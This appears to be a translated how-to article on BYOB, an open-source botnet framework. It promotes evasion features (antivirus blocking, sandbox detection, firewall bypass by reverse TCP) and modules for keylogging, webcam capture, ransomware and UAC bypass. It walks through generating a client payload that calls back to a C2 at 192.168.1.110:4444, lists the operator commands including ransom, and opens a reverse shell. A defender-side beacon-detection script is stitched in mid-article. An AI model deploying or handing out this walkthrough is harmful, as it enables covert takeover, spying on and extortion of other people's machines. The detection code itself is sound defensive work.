BYOB: Build Your Own Botnet

2025-01-19 Update, from SLTechnology News&Howtos (Network Security)

Shulou (Shulou.com) 06/01 report

BYOB is an open source project that gives security researchers and developers a framework for building and running basic botnets, so that they can deepen their understanding of the complex malware that infects millions of devices and spawns modern botnets each year, and improve their ability to develop countermeasures against these threats.

It is designed to let developers implement their own code and add new features easily, without having to write a RAT (remote administration tool) or a C2 (command and control server) from scratch.

The key feature of the RAT is that arbitrary code and files can be loaded remotely into memory from the C2 and executed on the target machine without anything being written to disk.

GitHub link: https://github.com/malwaredllc/byob

-

Features: using remote imports from the payload, the generated clients are described as completely undetectable.

- Remote imports: import third-party packages remotely from the server without writing them to disk or downloading/installing them.
- Nothing written to disk: clients never write anything to disk, not even temporary files (zero I/O system calls), because remote imports allow arbitrary code to be loaded dynamically into memory and imported directly into the currently running process.
- Zero dependencies (not even Python itself): the client runs on the Python standard library alone, imports any non-standard packages/modules remotely from the server, and can be compiled with a standalone Python interpreter into a portable binary executable for any platform/architecture, so it runs even when Python itself is missing on the target host.
- Add new functionality with one click: any Python script, module or package you copy into the ./byob/modules/ directory automatically becomes remotely importable and directly usable by every client while your command and control server is running.
- Write your own modules: a basic module template in the ./byob/modules/ directory makes writing a module a simple, barrier-free process.
- Run unlimited modules without increasing file size: remote imports add unlimited functionality without adding a single byte to the client's file size.
- Fully updatable: each client periodically checks the server for new content available for remote import, and dynamically updates its in-memory resources if anything has been added or removed.
- Platform independent: everything is written in Python (a platform-independent language), and the generated client can optionally be compiled into a portable executable (Windows) or bundled into a standalone application (macOS).
- Bypass firewalls: the client connects to the command and control server through a reverse TCP connection, which bypasses most firewalls because the default filter configuration mainly blocks incoming connections.
- Countermeasures against antivirus: prevents analysis by antivirus software by blocking processes with the names of known antivirus products from spawning.
- Encrypted payload to prevent analysis: the main client payload is encrypted with a random 256-bit key that exists only in the payload stager generated with it.
- Prevent reverse engineering: by default, the client aborts execution if a virtual machine or sandbox is detected.
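A defender-side check that follows from the reverse-TCP and periodic check-in behaviour listed above (an added example, not code from the BYOB project): it scans constructed connection-log lines for a Python interpreter making regularly spaced outbound connections to a single endpoint, which is the beacon pattern such a client leaves in host telemetry even when nothing touches the disk. The log format, host names, interpreter names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: timestamp, host, process image, direction, remote endpoint.
# hostA beacons every 30 s; hostB's python3 script connects at irregular gaps.
SAMPLE_LOG = """
2025-01-19T10:00:01 hostA python.exe OUT 192.168.1.110:4444
2025-01-19T10:00:05 hostA chrome.exe OUT 93.184.216.34:443
2025-01-19T10:00:31 hostA python.exe OUT 192.168.1.110:4444
2025-01-19T10:01:01 hostA python.exe OUT 192.168.1.110:4444
2025-01-19T10:00:09 hostB python3 OUT 10.0.0.5:443
2025-01-19T10:00:19 hostB python3 OUT 10.0.0.5:443
2025-01-19T10:05:19 hostB python3 OUT 10.0.0.5:443
2025-01-19T10:05:24 hostB python3 OUT 10.0.0.5:443
2025-01-19T10:00:40 hostC sshd IN 10.0.0.7:51234
"""
# Process images a BYOB-style client would typically run under (assumed list).
INTERPRETERS = {"python", "python3", "python.exe", "pythonw.exe"}
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (IN|OUT) (\S+)$")

def parse_log(text):
    """Parse the constructed format into (timestamp, host, image, direction, endpoint)."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, host, image, direction, endpoint = m.groups()
            events.append((datetime.fromisoformat(ts), host, image.lower(), direction, endpoint))
    return events

def find_beacons(text, min_conns=3, max_cv=0.25):
    """Flag interpreters with >= min_conns outbound connections to one endpoint at
    near-constant intervals (coefficient of variation of the gaps <= max_cv)."""
    by_key = defaultdict(list)
    for ts, host, image, direction, endpoint in parse_log(text):
        if direction == "OUT" and image in INTERPRETERS:
            by_key[(host, image, endpoint)].append(ts)
    alerts = []
    for (host, image, endpoint), stamps in sorted(by_key.items()):
        if len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else 0.0  # 0 means perfectly regular
        if cv <= max_cv:
            alerts.append({"host": host, "image": image, "endpoint": endpoint,
                           "count": len(stamps), "interval_s": round(avg, 1)})
    return alerts
```

Regularity is the signal here rather than the port, since a reverse-TCP client can listen on 443 as easily as on 4444; pair this with egress filtering, which the firewall-bypass item above implicitly recommends.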

Modules

Eleven remotely importable post-exploitation modules:

- Keylogger (byob.modules.keylogger): record the user's keystrokes and the name of the window they were typed into
- Screenshot (byob.modules.screenshot): capture a screenshot of the current user's desktop
- Webcam (byob.modules.webcam): view a live stream or capture images/video from the webcam
- Ransom (byob.modules.ransom): encrypt files and generate a random BTC wallet for ransom payment
- Outlook (byob.modules.outlook): read/search/upload email from the local Outlook client
- Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network and upload the .pcap file
- Persistence (byob.modules.persistence): establish persistence on the host using five different methods
- Phone (byob.modules.phone): read/search SMS messages on the client smartphone
- Escalate Privileges (byob.modules.escalate): attempt a UAC bypass to gain unauthorized administrator privileges
- Port Scanner (byob.modules.portscanner): scan the local network for other online devices and open ports
- Process Control (byob.modules.process): list/search/kill/monitor processes currently running on the host

Core

Six core framework modules used by the generator and the server:

- Utilities (byob.core.util): miscellaneous utility functions used by many modules
- Handlers (byob.core.handlers): request handlers that receive the results of completed tasks from clients
- Security (byob.core.security): Diffie-Hellman IKE and three encryption modes (AES-256-OCB, AES-256-CBC, XOR-128)
- Loaders (byob.core.loaders): remotely import any package/module/script from the server
- Payloads (byob.core.payloads): reverse TCP shell designed to remotely import its dependencies, packages and modules
- Stagers (byob.core.stagers): generate a unique payload stager to prevent analysis and detection
- Generators (byob.core.generators): functions that dynamically generate the client generator code
- Database (byob.core.database): handle the interaction between the command and control server and the SQLite database

-

Installation:

git clone https://github.com/malwaredllc/byob

After downloading, enter the byob directory:

pip install -r requirements.txt

It is now installed.

client.py generates the client and server.py is the server.

python client.py --help

usage: client.py [-h] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] [--compress] [--freeze] [-v]
                 host port [module [module ...]]

Generator (Build Your Own Botnet)

positional arguments:
  host            server IP address
  port            server port
  module          modules imported remotely at run time

optional arguments:
  -h, --help      show this help
  --name NAME     file name of the generated payload
  --icon ICON     icon (specify the file location)
  --pastebin API  upload the payload to pastebin (instead of hosting it on the C2 server)
  --encrypt       encrypt the payload with a random 128-bit key embedded in the payload stager
  --compress      compress the payload into a self-extracting python script
  --freeze        compile the client into a standalone executable for the current host platform
  -v, --version   show the version number

-

(server.py's help is not explained here.)

Now we generate a client (no module is used in this experiment):

python client.py --name test 192.168.1.110 4444

Here test is the payload name, 192.168.1.110 is the server IP address and 4444 is the port number.

We can now see that the Python backdoor program has been generated; open it and have a look.

Now open a new terminal:

python server.py --host 192.168.1.110 --port 4444

The server waits for the controlled host to run the payload, which connects back automatically.

At this point, run the generated test.py on the controlled side.

Go back to the server and it shows that the client is already connected.

Then enter help to view the help information:

[root @ /usr/src/byob/byob] > help

bg [id]            background a session (default: current session)
broadcast          broadcast a task to all active sessions
clients            display all clients that have joined the server
debug              run python code directly on the server (debugging must be enabled)
exit               exit
help               view help
kill               end the session
options            display the current configuration
query              query the SQLite database
ransom [id]        encrypt client files and hold the encryption key for ransom in exchange for bitcoin payment
results [id]       display all completed results for a client (default: all clients)
sessions           display the active client sessions
set [option=value] change the current configuration
shell              reverse tcp shell session
tasks [id]         show all outstanding client tasks (default: all clients)
webcam             capture images or video from the client's camera

-

I see that my id is 1, my user name is root and I am an administrator.

[root @ /usr/src/byob/byob] > shell 1

Checking the IP address works normally.

The experiment was successful.

-

This script keeps adding new features; stay tuned.
